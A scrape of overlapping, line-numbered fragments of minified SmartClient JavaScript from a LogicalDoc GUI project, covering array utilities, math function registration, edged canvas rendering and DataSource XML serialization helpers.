i=0;i<_1.length;++i){_1[i]=(_2^(Math.random()*65536))&0xFFFF}}664_1[3]=(_1[3]&0x0FFF)|0x4000;_1[4]=(_1[4]&0xBFFF)|0x8000;return(this.$119q(_1[0],4)+this.$119q(_1[1],4)+"-"+this.$119q(_1[2],4)+"-"+this.$119q(_1[3],4)+"-"+this.$119q(_1[4],4)+"-"+this.$119q(_1[5],4)+this.$119q(_1[6],4)+this.$119q(_1[7],4)).toUpperCase()},randomString:function(_1,_2){var _3=new Array(_1);var _4;if(isc.isA.Number(_2)){_4=_2;_2="0123456789abcdefghijklmnopqrstuvwxyz".substring(0,_4)}else{_4=_2.length}665for(var i=0;i<_1;++i){_3[i]=_2[this.random(_4-1)]}666return _3.join("")},$101j:function(_1){return(_1<0?-1:(_1>0?1:0))},$101k:function(_1,_2){_1=Math.abs(_1);_2=Math.abs(_2);if(_1>_2){return _1*Math.sqrt(1+_2*_2/_1/_1)}else if(_2!=0){return _2*Math.sqrt(1+_1*_1/_2/_2)}else{return _1}},euclideanDistanceToLine:function(_1,_2,_3,_4,_5,_6){var _7=_3-_1,_8=_4-_2;var _9=_7*_7+_8*_8;if(_9<=0.00001){return this.euclideanDistance(_1,_2,_5,_6)}667var u=((_5-_1)*(_3-_1)+(_6-_2)*(_4-_2))/_9;if(u<0){return this.euclideanDistance(_1,_2,_5,_6)}else if(u>1){return this.euclideanDistance(_3,_4,_5,_6)}else{var x=_1+u*_7,y=_2+u*_8;return this.euclideanDistance(x,y,_5,_6)}},euclideanDistance:function(_1,_2,_3,_4){if(arguments.length==2){var _5=_1,_6=_2;_1=_5[0];_2=_5[1];_3=_6[0];_4=_6[1]}668return this.$101k((_1-_3),(_2-_4))},$125w:Math.PI/180,$167a:Math.PI/2,toRadians:function(_1){return _1*this.$125w},cosdeg:function(_1){return Math.cos(_1*this.$125w)},sindeg:function(_1){return Math.sin(_1*this.$125w)},$fr:function(_1,_2){var _3=0;for(var i=0;i<_1.length;++i){_3+=_1[i]*_2[i]}


File name: logicaldoc/logicaldoc-gui/war/login/sc/system/development/ISC_Core.js
Code:

504if(_5){_4[_8]=_7;continue}505var _9=_4[_8];if(_9==null){if(_2){_4[_8]=[_7]}else{_4[_8]=_7}}else{if(_2){_4[_8].add(_7)}else{if(isc.isAn.Array(_9)){_4[_8].add(_7)}else{_4[_8]=[_9,_7]}}}}506return _4},isc.A.arraysToObjects=function isc_Arra_arraysToObjects(_1){var _2=_1.length;var _3=new Array(this.length);for(var i=this.length;i--;){var _5=this[i],_6=_3[i]={};for(var p=_2;p--;){var _8=_1[p];_6[_8]=_5[p]}}507return _3},isc.A.objectsToArrays=function isc_Arra_objectsToArrays(_1){var _2=_1.length;var _3=new Array(this.length);for(var i=this.length;i--;){var _5=this[i],_6=_3[i]=[];for(var p=_2;p--;){var _8=_1[p];_6[p]=_5[_8]}}508return _3},isc.A.spliceArray=function isc_Arra_spliceArray(_1,_2,_3){var _4;if(_1===_4)return this.splice();if(_2===_4)return this.splice(_1);if(_3===_4)return this.splice(_1,_2);if(!isc.isAn.Array(_3)){isc.Log.logWarn("spliceArray() method passed a non-array third parameter. Ignoring...","Array");return this.splice(_1,_2)}509return this.splice.apply(this,[_1,_2].concat(_3))},isc.A.peek=function isc_Arra_peek(){var _1=this.pop();this.push(_1);return _1},isc.A.getCachedRow=function isc_Arra_getCachedRow(_1){return this[_1]},isc.A.shuffle=function isc_Arra_shuffle(){var n=this.length;while(n>0){var i=Math.floor(Math.random()*n);n--;var _3=this[n];this[n]=this[i];this[i]=_3}},isc.A.removeItem=function isc_Arra_removeItem(_1){return this.removeAt(_1)},isc.A.getItem=function isc_Arra_getItem(_1){return this.get(_1)},isc.A.setItem=function isc_Arra_setItem(_1){return this.set(_1)},isc.A.clearAll=function isc_Arra_clearAll(_1){return this.removeList(this)},isc.A.size=function isc_Arra_size(){return this.getLength()},isc.A.subList=function isc_Arra_subList(_1,_2){return this.getRange(_1,_2)},isc.A.addAll=function isc_Arra_addAll(_1){return this.addList(_1)},isc.A.removeAll=function isc_Arra_removeAll(_1){var _2=this.getLength();this.removeList(_1);return this.getLength()!=_2},isc.A.clear=function 
isc_Arra_clear(){this.setLength(0)},isc.A.toArray=function isc_Arra_toArray(){return this.duplicate()});isc.B._maxIndex=isc.C+79;if(!isc.Browser.isIE||


isc.Browser.isIE8Strict){Array.prototype.duplicate=Array.prototype.slice}510if(isc.Browser.isIE){[].fastIndexOf();[].fastIndexOf()}511if(Array.prototype.nativeIndexOf!=null){Array.prototype.indexOf=function(_1,_2,_3,_4){var _5=Object(this),_6=_5.length>>>0;if(_2==null)_2=0;else if(_2<0)_2=Math.max(0,_6+_2);if(_3==null)_3=_6-1;var i;if(_4!=null){for(i=_2;i<=_3;++i){if(_4(_5[i],_1))return i}}else{if(isc.isAn.Instance(_1)){i=Array.prototype.nativeIndexOf.call(_5,_1,_2);if(i>_3)i=-1;return i}512for(i=_2;i<=_3;++i){if(_5[i]==_1)return i}}513return-1}}else{Array.prototype.nativeIndexOf=Array.prototype.indexOf}514if(isc.Browser.isFirefox||isc.Browser.isSafari){Array.prototype.fastIndexOf=Array.prototype.nativeIndexOf}

File name: logicaldoc/logicaldoc-gui/war/login/sc/system/development/ISC_Core.js
Code:

3778var _2=_1.$152v();_2.name=_1.name.toLowerCase();_2.defaultSortPosition=-1;if(!this.$65z[_2.name]){this.$65z[_2.name]=_2}3779var _3=_1.$152v();_3.name=_1.name.toUpperCase();_3.defaultSortPosition=-1;if(!this.$65z[_3.name]){this.$65z[_3.name]=_3}3780var _4=_1.$152v();_4.name=(_1.name.substr(0,1).toUpperCase()+_1.name.substr(1));_4.defaultSortPosition=-1;if(!this.$65z[_4.name]){this.$65z[_4.name]=_4}},isc.A.getRegisteredFunctionNames=function isc_c_MathFunction_getRegisteredFunctionNames(){return isc.getKeys(this.$65z)},isc.A.getDefaultFunctionNames=function isc_c_MathFunction_getDefaultFunctionNames(){var _1=this.getDefaultFunctions(),_2=_1.makeIndex("name",false);return isc.getKeys(_2)},isc.A.getRegisteredFunctions=function isc_c_MathFunction_getRegisteredFunctions(){return isc.getValues(this.$65z)},isc.A.getDefaultFunctions=function isc_c_MathFunction_getDefaultFunctions(){var _1=this.getRegisteredFunctions(),_2=_1.findAll("defaultSortPosition",-1)||[];for(var i=0;i<_2.length;i++){var _4=_2[i];_1.remove(_4)}3781_1.sortByProperties(["defaultSortPosition"],["true"]);return _1},isc.A.getRegisteredFunctionIndex=function isc_c_MathFunction_getRegisteredFunctionIndex(){var x=this.getRegisteredFunctions();var _2=x.makeIndex("name",false);return _2},isc.A.getDefaultFunctionIndex=function isc_c_MathFunction_getDefaultFunctionIndex(){return this.getDefaultFunctions().makeIndex("name",false)},isc.A.isRegistered=function isc_c_MathFunction_isRegistered(_1){if(this.$65z[_1])return true;return false});isc.B._maxIndex=isc.C+8;isc.A=isc.MathFunction.getPrototype();isc.B=isc._allFuncs;isc.C=isc.B._maxIndex;isc.D=isc._funcClasses;isc.D[isc.C]=isc.A.Class;isc.A.defaultSortPosition=-1;isc.B.push(isc.A.$152v=function isc_MathFunction__copy(_1){var _2={};for(var _3 in this){if(this.hasOwnProperty(_3)){_2[_3]=this[_3]}}3782return this.getClass().create(_2,_1)});isc.B._maxIndex=isc.C+1;isc.MathFunction.registerFunction(isc.MathFunction.create({name:"max",description:"Maximum of two 
values",usage:"max(value1, value2)",defaultSortPosition:1,jsFunction:function(_1,_2){return Math.max(_1,_2)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"min",description:"Minimum of two values",usage:"min(value1, value2)",defaultSortPosition:2,jsFunction:function(_1,_2){return Math.min(_1,_2)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"clamp",description:"Value clamped to range specified",usage:"clamp(value1, value2)",defaultSortPosition:3,jsFunction:function(_1,_2,_3){return isc.Math.clamp(_1,_2,_3)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"round",description:"Round a value up or down, optionally providing <i>decimalDigits</i> as the maximum number of decimal places to round to.  For fixed or precision rounding, use <i>toFixed()</i> and <i>toPrecision()</i> respectively.",usage:"round(value,decimalDigits)",defaultSortPosition:4,jsFunction:function(_1,_2){if(_2){var _3=Math.pow(10,_2),_4=Math.round(_1*_3)/_3;return _4}3783return Math.round(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"ceil",description:"Round a value up",usage:"ceil(value)",defaultSortPosition:5,jsFunction:function(_1){return Math.ceil(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"floor",description:"Round a value down",usage:"floor(value)",defaultSortPosition:6,jsFunction:function(_1){return Math.floor(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"abs",description:"Absolute value",usage:"abs(value)",defaultSortPosition:7,jsFunction:function(_1){return Math.abs(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"pow",description:"Value1 to the power of Value2",usage:"pow(value1, value2)",defaultSortPosition:8,jsFunction:function(_1,_2){return Math.pow(_1,_2)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"sqrt",description:"Square root of a 
value",usage:"sqrt(value)",defaultSortPosition:9,jsFunction:function(_1){return Math.sqrt(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"dateAdd",description:"Excel&trade;-compatible dataAdd function: adds a specified time interval to a date value",usage:"dateAdd(Date value, TimeUnit interval, number amount)",defaultSortPosition:10,jsFunction:function(_1,_2,_3){if(_1==null||!isc.isA.Date(_1))return null;var _4=_1.duplicate();isc.DateUtil.dateAdd(_4,_2,_3,1,_1.logicalDate);return _4}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"toPrecision",description:"Format a number to a length of <i>precision</i> digits, rounding or adding a decimal point and zero-padding as necessary.  Note that the values 123, 12.3 and 1.23 have an equal precision of 3.  Returns a formatted string and should be used as the outermost function call in a formula. For rounding, use <i>round()</i>.",usage:"toPrecision(value,precision)",defaultSortPosition:11,jsFunction:function(_1,_2){var _3=_1;if(isc.isA.String(_3))_3=parseFloat(_3);if(isNaN(_3))return _1;return _3.toPrecision(_2)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"toFixed",description:"Round or zero-pad a number to <i>digits</


i> decimal places.  Returns a formatted string and should be used as the outermost function call in a formula.  To round values or restrict precision, use <i>round()</i> and <i>toPrecision()</i> respectively.",usage:"toFixed(value,digits)",defaultSortPosition:12,jsFunction:function(_1,_2){var _3=_1;if(isc.isA.String(_3))_3=parseFloat(_3);if(isNaN(_3))return _1;return _3.toFixed(_2)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"sin",description:"Sine of a value",usage:"sin(value)",defaultSortPosition:13,jsFunction:function(_1){return Math.sin(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"cos",description:"Cosine of a value",usage:"cos(value)",defaultSortPosition:14,jsFunction:function(_1){return Math.cos(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"tan",description:"Tangent of a value",usage:"tan(value)",defaultSortPosition:15,jsFunction:function(_1){return Math.tan(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"ln",description:"Natural logarithm of a value",usage:"ln(value)",defaultSortPosition:16,jsFunction:function(_1){return Math.log(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"log",description:"logarithm of a value with the specified <i>base</i>",usage:"log(base, value)",defaultSortPosition:17,jsFunction:function(_1,_2){return Math.log(_2)/Math.log(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"asin",description:"Arcsine of a value",usage:"asin(value)",defaultSortPosition:18,jsFunction:function(_1){return Math.asin(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"acos",description:"Arccosine of a value",usage:"acos(value)",defaultSortPosition:19,jsFunction:function(_1){return Math.acos(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"atan",description:"Arctangent of a value (-PI/2 to PI/2 
radians)",usage:"atan(value)",defaultSortPosition:20,jsFunction:function(_1){return Math.atan(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"atan2",description:"Angle theta of a point (-PI to PI radians)",usage:"atan2(value1,value2)",defaultSortPosition:21,jsFunction:function(_1,_2){return Math.atan2(_1,_2)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"exp",description:"The value of E<sup>value</sup>",usage:"exp(value)",defaultSortPosition:22,jsFunction:function(_1){return Math.exp(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"random",description:"Random number between 0 and 1",usage:"random()",defaultSortPosition:23,jsFunction:function(){return Math.random()}}));isc.Canvas.registerStringMethods({userAddedField:"field",selectionUpdated:"record,recordList",onFetchData:"criteria,requestProperties"});isc.defineClass("EdgedCanvas","Canvas");isc.A=isc.EdgedCanvas.getPrototype();isc.A.redrawOnResize=false;isc.A._redrawWithParent=false;isc.A.$jp=false;isc.A.$jo=false;isc.A.useClipDiv=false;isc.A.isSnapAlignCandidate=false;isc.A.overflow=isc.Browser.isMoz?isc.Canvas.VISIBLE:isc.Canvas.HIDDEN;isc.A.$ks=false;isc.A.$tb=0;isc.A.$td=0;isc.A.$tc=0;isc.A.$te=0;isc.A.$y0=["TL","T","TR","L","center","R","BL","B","BR"];isc.A.$98g={L:true,TL:true,BL:true};isc.A.$98h={R:true,TR:true,BR:true};isc.A.$920=["TR","T","TL","R","center","L","BR","B","BL"];isc.A.skinImgDir="images/edges/";isc.A.edgeImage="[SKIN]/rounded/frame/FFFFFF/6.png";isc.A.shownEdges={TL:true,T:true,TR:true,L:true,R:true,BL:true,B:true,BR:true};isc.A.edgeSize=6;isc.A=isc.EdgedCanvas.getPrototype();isc.B=isc._allFuncs;isc.C=isc.B._maxIndex;isc.D=isc._funcClasses;isc.D[isc.C]=isc.A.Class;isc.A.$61h="<TD class='";isc.A.$61i="' ></TD>";isc.A.$y2="<TABLE role='presentation' CELLPADDING='0' CELLSPACING='0' STYLE='height:100%;width:100%;table-layout:fixed'><COL WIDTH=";isc.A.$y3="><COL><COL WIDTH=";isc.A.$98i=["background-size:",,," 
",,,";"];isc.A.$4n=" class=";isc.A.addEdgeStyleSuffix=false;isc.A.forceMozRowHeight=true;isc.B.push(isc.A.initWidget=function isc_EdgedCanvas_initWidget(){this.invokeSuper(isc.EdgedCanvas,this.$oc);var _1=this.customEdges;if(_1){var _2=this.shownEdges={};if(_1.contains("T")){_2.T=_2.TL=_2.TR=true}3784if(_1.contains("B")){_2.B=_2.BL=_2.BR=true}3785if(_1.contains("L")){_2.L=_2.TL=_2.BL=true}3786if(_1.contains("R")){_2.R=_2.TR=_2.BR=true}}3787this.updateEdgeSizes()},isc.A.updateEdgeSizes=function isc_EdgedCanvas_updateEdgeSizes(){var _1=this.edgeSize;this.$y4=this.$du(this.edgeLeft,_1);this.$y5=this.$du(this.edgeRight,_1);this.$y6=this.$du(this.edgeTop,_1);this.$y7=this.$du(this.edgeBottom,_1);var _2=this.shownEdges,_3=this.edgeOffset;if(_2.L)this.$tb=this.$du(this.edgeOffsetLeft,_3,this.$y4);if(_2.R)this.$tc=this.$du(this.edgeOffsetRight,_3,this.$y5);if(_2.T)this.$td=this.$du(this.edgeOffsetTop,_3,this.$y6);if(_2.B)this.$te=this.$du(this.edgeOffsetBottom,_3,this.$y7);this.markForRedraw()},isc.A.getInnerWidth=function isc_EdgedCanvas_getInnerWidth(_1,_2,_3){var _4=this.invokeSuper(isc.EdgedCanvas,"getInnerWidth",_1,_2,_3);return _4-this.$tb-this.$tc},isc.A.getInnerHeight=function isc_EdgedCanvas_getInnerHeight(_1,_2,_3){var _4=this.invokeSuper(isc.EdgedCanvas,"getInnerHeight",_1,_2,_3);return _4-this.$td-this.$te},isc.A.getInnerHTML=function isc_EdgedCanvas_getInnerHTML(){var _1=isc.SB.create(),_2=this.edgeImage,_3=_2.lastIndexOf(isc.dot),_4=_2.substring(0,_3),_5=_2.substring(_3),_6=this.getImgURL(_4),_7="<TD HEIGHT=",_8="<TD",_9,_10,_11;if(!isc.Browser.isIE10&&!isc.Browser.isEdge&&!((isc.Browser.isStrict&&isc.Browser.isIE&&isc.Browser.version>=8)||(isc.Browser.isMoz&&isc.Browser.isUnix)))3788{var _12=isc.EdgedCanvas.$y8;if(!_12){_12=isc.EdgedCanvas.$y8={width:"100%",height:"100%"};if(isc.Browser.isSafari)_12.align="middle";if(isc.Browser.isStrict&&!isc.Browser.isTransitional){_12.extraCSSText="display:block"}


File name: logicaldoc/logicaldoc-gui/war/login/sc/system/development/ISC_DataBinding.js
Code:

717return _5.release(false)},isc.A.shouldWriteSchemaType=function isc_DataSource_shouldWriteSchemaType(_1){if(!_1)return true;if(_1.serializeXMLType!=null)return _1.serializeXMLType;else{return(_1.type==null||_1.type=="any")}},isc.A.$38g=function isc_DataSource__serializeSimpleTypeTag(_1,_2,_3,_4,_5){var _6=_2.type,_5=_5||{};if(isc.isAn.Object(_3)&&!isc.isA.Function(_3.$ew)){return isc.Comm.xmlSerialize(_1||null,_3)}else{var _6=!_5.xmlExplicitType||this.shouldWriteSchemaType(_2)?this.$38h(_6,_3):null;if(_3==null&&_2.nillable){var _7=_1||"value";return isc.Comm.$36u(_7,null,_4,_5.nsPrefixes,true)+" xsi:nil=\"true\"/>"}718if(isc.isA.Date(_3)){_3=_3.toSchemaDate(_2.type,!!this.trimMilliseconds)}else if(_3!=null&&_3.$ew){return _3.$ew(_1,_6,_4)}else{_3=isc.makeXMLSafe(_3)}719return isc.Comm.$ex(_1||"value",_3,_6,_4,_5.nsPrefixes)}},isc.A.$38f=function isc_DataSource__serializeSimpleTypeValue(_1,_2){if(isc.isA.Date(_2)){return _2.toSchemaDate(_1?_1.type:null)}else{return isc.makeXMLSafeAttribute(_2)}},isc.A.$38h=function isc_DataSource__getXMLSchemaType(_1,_2){if(_2!=null&&(_1==null||_1=="any")){if(_2==null)return null;if(isc.isA.Date(_2)){return _2.logicalDate?"date":(_2.logicalTime?"time":"datetime")}else if(isc.isA.Number(_2)){if(parseInt(_2)==_2){return"float"}else{return"integer"}}else if(isc.isA.Boolean(_2)){return"boolean"}else if(isc.isA.String(_2)){return"text"}}720switch(_1){case"integer":return"int";case"number":return"long";default:return _1}},isc.A.$151z=function isc_DataSource__getXmlExplicitTypes(_1){var _2=_1;if(isc.isA.String(_2))_2=(_2=="true");return _2},isc.A.xmlSerializeSample=function isc_DataSource_xmlSerializeSample(){return this.xmlSerialize({},{spoofData:true})},isc.A.getSpoofedData=function isc_DataSource_getSpoofedData(_1){if(!_1)return"textValue";if(this.getSchema(_1.type)!=null)return{};if(_1.multiple){_1={type:_1.type};return[this.getSpoofedData(_1),this.getSpoofedData(_1)]}721if(_1.valueMap){var 
_2=!isc.isAn.Array(_1.valueMap)?isc.getKeys(_1.valueMap):_1.valueMap;return _2[Math.round(Math.random()*(_2.length-1))]}722var _3=isc.SimpleType.getBaseType(_1.type);switch(_3){case"boolean":return(Math.random()>0.5);case"integer":case"int":case"number":var _4=0,_5=10;if(_1.validators){var _6=_1.validators.find("type","integerRange")||_1.validators.find("_constructor","integerRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator  with min "+_6.min+" and max "+_6.max);_4=_6.min||0;_5=_6.max||Math.min(_4,10);if(_4>_5)_4=_5}}723return Math.round(_4+(Math.random()*(_5-_4)));case"float":case"decimal":case"double":var _4=0,_5=10,_7=2;if(_1.validators){var _6=_1.validators.find("type","floatRange")||_1.validators.find("_constructor","floatRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator  with min "+_6.min+" and max "+_6.max);_4=_6.min||0;_5=_6.max||Math.min(_4,10);if(_4>_5)_4=_5}724var _8=_1.validators.find("type","floatPrecision")||_1.validators.find("_constructor","floatPrecision");if(_8){_7=_8.precision||2}}725return(_4+(Math.random()*(_5-_4))).toFixed(_7);case"date":case"time":case"datetime":var _9=new Date();if(_1.validators){var _6=_1.validators.find("type","dateRange")||_1.validators.find("_constructor","dateRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator  with min "+_6.min+" and max "+_6.max);if(_6.min)_9=_6.min;else if(_6.max)_9=_6.max}}726return _9;default:return"textValue"}},isc.A.getSerializeableFields=function isc_DataSource_getSerializeableFields(_1,_2){var _3=this.Super("getSerializeableFields",arguments);var _4=_3.fields;_4=isc.getValues(_4);for(var i=0;i<_4.length;i++){var _6=_4[i]=isc.addProperties({},_4[i]);var _7=_6.validators;if(_7){_6.validators=_7.findAll("_generated",null);if(_6.validators==null)delete _6.validators}}727_3.fields=_4;return _3},isc.A.getMethods=function isc_DataSource_getMethods(){var _1=this.methods||[];if(this.superDS()!=null){_1.addAll(this.superDS().getMethods())}

File name: logicaldoc/logicaldoc-gui/war/login/sc/system/development/ISC_DataBinding.js
Code:

718if(isc.isA.Date(_3)){_3=_3.toSchemaDate(_2.type,!!this.trimMilliseconds)}else if(_3!=null&&_3.$ew){return _3.$ew(_1,_6,_4)}else{_3=isc.makeXMLSafe(_3)}719return isc.Comm.$ex(_1||"value",_3,_6,_4,_5.nsPrefixes)}},isc.A.$38f=function isc_DataSource__serializeSimpleTypeValue(_1,_2){if(isc.isA.Date(_2)){return _2.toSchemaDate(_1?_1.type:null)}else{return isc.makeXMLSafeAttribute(_2)}},isc.A.$38h=function isc_DataSource__getXMLSchemaType(_1,_2){if(_2!=null&&(_1==null||_1=="any")){if(_2==null)return null;if(isc.isA.Date(_2)){return _2.logicalDate?"date":
(_2.logicalTime?"time":"datetime")}else if(isc.isA.Number(_2)){if(parseInt(_2)==_2){return"float"}else{return"integer"}}else if(isc.isA.Boolean(_2)){return"boolean"}else if(isc.isA.String(_2)){return"text"}}720switch(_1){case"integer":return"int";case"number":return"long";default:return _1}},isc.A.$151z=function isc_DataSource__getXmlExplicitTypes(_1){var _2=_1;if(isc.isA.String(_2))_2=(_2=="true");return _2},isc.A.xmlSerializeSample=function isc_DataSource_xmlSerializeSample(){return this.xmlSerialize({},{spoofData:true})},isc.A.getSpoofedData=function isc_DataSource_getSpoofedData(_1){if(!_1)return"textValue";if(this.getSchema(_1.type)!=null)return{};if(_1.multiple){_1={type:_1.type};return[this.getSpoofedData(_1),this.getSpoofedData(_1)]}721if(_1.valueMap){var _2=!isc.isAn.Array(_1.valueMap)?isc.getKeys(_1.valueMap):_1.valueMap;return _2[Math.round(Math.random()*(_2.length-1))]}722var _3=isc.SimpleType.getBaseType(_1.type);switch(_3){case"boolean":return(Math.random()>0.5);case"integer":case"int":case"number":var _4=0,_5=10;if(_1.validators){var _6=_1.validators.find("type","integerRange")||_1.validators.find("_constructor","integerRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator  with min "+_6.min+" and max "+_6.max);_4=_6.min||0;_5=_6.max||Math.min(_4,10);if(_4>_5)_4=_5}}723return Math.round(_4+(Math.random()*(_5-_4)));case"float":case"decimal":case"double":var _4=0,_5=10,_7=2;if(_1.validators){var _6=_1.validators.find("type","floatRange")||_1.validators.find("_constructor","floatRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator  with min "+_6.min+" and max "+_6.max);_4=_6.min||0;_5=_6.max||Math.min(_4,10);if(_4>_5)_4=_5}724var _8=_1.validators.find("type","floatPrecision")||_1.validators.find("_constructor","floatPrecision");if(_8){_7=_8.precision||2}}725return(_4+(Math.random()*(_5-_4))).toFixed(_7);case"date":case"time":case"datetime":var _9=new Date();if(_1.validators){var 
_6=_1.validators.find("type","dateRange")||_1.validators.find("_constructor","dateRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator  with min "+_6.min+" and max "+_6.max);if(_6.min)_9=_6.min;else if(_6.max)_9=_6.max}}726return _9;default:return"textValue"}},isc.A.getSerializeableFields=function isc_DataSource_getSerializeableFields(_1,_2){var _3=this.Super("getSerializeableFields",arguments);var _4=_3.fields;_4=isc.getValues(_4);for(var i=0;i<_4.length;i++){var _6=_4[i]=isc.addProperties({},_4[i]);var _7=_6.validators;if(_7){_6.validators=_7.findAll("_generated",null);if(_6.validators==null)delete _6.validators}}727_3.fields=_4;return _3},isc.A.getMethods=function isc_DataSource_getMethods(){var _1=this.methods||[];if(this.superDS()!=null){_1.addAll(this.superDS().getMethods())}728return _1},isc.A.getDeclaredMethod=function isc_DataSource_getDeclaredMethod(_1){var _2=this.getMethods();for(var i=0;i<_2.length;i++){if(_2[i].name==_1){return _2[i]}}},isc.A.getStringMethod=function isc_DataSource_getStringMethod(_1,_2){var _3=this.getDeclaredMethod(_1);if(_3){var _4=isc.addProperties({},_3);_4.value=_2;return isc.StringMethod.create(_4)}

File name: logicaldoc/logicaldoc-gui/war/login/sc/system/development/ISC_DataBinding.js
Code:

716if(_14){isc.Comm.omitXSI=_15}717return _5.release(false)},isc.A.shouldWriteSchemaType=function isc_DataSource_shouldWriteSchemaType(_1){if(!_1)return true;if(_1.serializeXMLType!=null)return _1.serializeXMLType;else{return(_1.type==null||_1.type=="any")}},isc.A.$38g=function isc_DataSource__serializeSimpleTypeTag(_1,_2,_3,_4,_5){var _6=_2.type,_5=_5||{};if(isc.isAn.Object(_3)&&!isc.isA.Function(_3.$ew)){return isc.Comm.xmlSerialize(_1||null,_3)}else{var _6=!_5.xmlExplicitType||this.shouldWriteSchemaType(_2)?this.$38h(_6,_3):null;if(_3==null&&_2.nillable){var _7=_1||"value";return isc.Comm.$36u(_7,null,_4,_5.nsPrefixes,true)+" xsi:nil=\"true\"/>"}718if(isc.isA.Date(_3)){_3=_3.toSchemaDate(_2.type,!!this.trimMilliseconds)}else if(_3!=null&&_3.$ew){return _3.$ew(_1,_6,_4)}else{_3=isc.makeXMLSafe(_3)}719return isc.Comm.$ex(_1||"value",_3,_6,_4,_5.nsPrefixes)}},isc.A.$38f=function isc_DataSource__serializeSimpleTypeValue(_1,_2){if(isc.isA.Date(_2)){return _2.toSchemaDate(_1?_1.type:null)}else{return isc.makeXMLSafeAttribute(_2)}},isc.A.$38h=function isc_DataSource__getXMLSchemaType(_1,_2){if(_2!=null&&(_1==null||_1=="any")){if(_2==null)return null;if(isc.isA.Date(_2)){return _2.logicalDate?"date":(_2.logicalTime?"time":"datetime")}else if(isc.isA.Number(_2)){if(parseInt(_2)==_2){return"float"}else{return"integer"}}else if(isc.isA.Boolean(_2)){return"boolean"}else if(isc.isA.String(_2)){return"text"}}
720switch(_1){case"integer":return"int";case"number":return"long";default:return _1}},isc.A.$151z=function isc_DataSource__getXmlExplicitTypes(_1){var _2=_1;if(isc.isA.String(_2))_2=(_2=="true");return _2},isc.A.xmlSerializeSample=function isc_DataSource_xmlSerializeSample(){return this.xmlSerialize({},{spoofData:true})},isc.A.getSpoofedData=function isc_DataSource_getSpoofedData(_1){if(!_1)return"textValue";if(this.getSchema(_1.type)!=null)return{};if(_1.multiple){_1={type:_1.type};return[this.getSpoofedData(_1),this.getSpoofedData(_1)]}721if(_1.valueMap){var _2=!isc.isAn.Array(_1.valueMap)?isc.getKeys(_1.valueMap):_1.valueMap;return _2[Math.round(Math.random()*(_2.length-1))]}722var _3=isc.SimpleType.getBaseType(_1.type);switch(_3){case"boolean":return(Math.random()>0.5);case"integer":case"int":case"number":var _4=0,_5=10;if(_1.validators){var _6=_1.validators.find("type","integerRange")||_1.validators.find("_constructor","integerRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator  with min "+_6.min+" and max "+_6.max);_4=_6.min||0;_5=_6.max||Math.min(_4,10);if(_4>_5)_4=_5}}723return Math.round(_4+(Math.random()*(_5-_4)));case"float":case"decimal":case"double":var _4=0,_5=10,_7=2;if(_1.validators){var _6=_1.validators.find("type","floatRange")||_1.validators.find("_constructor","floatRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator  with min "+_6.min+" and max "+_6.max);_4=_6.min||0;_5=_6.max||Math.min(_4,10);if(_4>_5)_4=_5}724var _8=_1.validators.find("type","floatPrecision")||_1.validators.find("_constructor","floatPrecision");if(_8){_7=_8.precision||2}}725return(_4+(Math.random()*(_5-_4))).toFixed(_7);case"date":case"time":case"datetime":var _9=new Date();if(_1.validators){var _6=_1.validators.find("type","dateRange")||_1.validators.find("_constructor","dateRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator  with min "+_6.min+" and max "+_6.max);if(_6.min)_9=_6.min;else if(_6.max)_9=_6.max}}726return 
_9;default:return"textValue"}},isc.A.getSerializeableFields=function isc_DataSource_getSerializeableFields(_1,_2){var _3=this.Super("getSerializeableFields",arguments);var _4=_3.fields;_4=isc.getValues(_4);for(var i=0;i<_4.length;i++){var _6=_4[i]=isc.addProperties({},_4[i]);var _7=_6.validators;if(_7){_6.validators=_7.findAll("_generated",null);if(_6.validators==null)delete _6.validators}}

File name: logicaldoc/logicaldoc-gui/war/login/sc/system/development/ISC_DataBinding.js
Code:

720switch(_1){case"integer":return"int";case"number":return"long";default:return _1}},isc.A.$151z=function isc_DataSource__getXmlExplicitTypes(_1){var _2=_1;if(isc.isA.String(_2))_2=(_2=="true");return _2},isc.A.xmlSerializeSample=function isc_DataSource_xmlSerializeSample(){return this.xmlSerialize({},{spoofData:true})},isc.A.getSpoofedData=function isc_DataSource_getSpoofedData(_1){if(!_1)return"textValue";if(this.getSchema(_1.type)!=null)return{};if(_1.multiple){_1={type:_1.type};return[this.getSpoofedData(_1),this.getSpoofedData(_1)]}721if(_1.valueMap){var _2=!isc.isAn.Array(_1.valueMap)?isc.getKeys(_1.valueMap):_1.valueMap;return _2[Math.round(Math.random()*(_2.length-1))]}722var _3=isc.SimpleType.getBaseType(_1.type);switch(_3){case"boolean":return(Math.random()>0.5);case"integer":case"int":case"number":var _4=0,_5=10;if(_1.validators){var 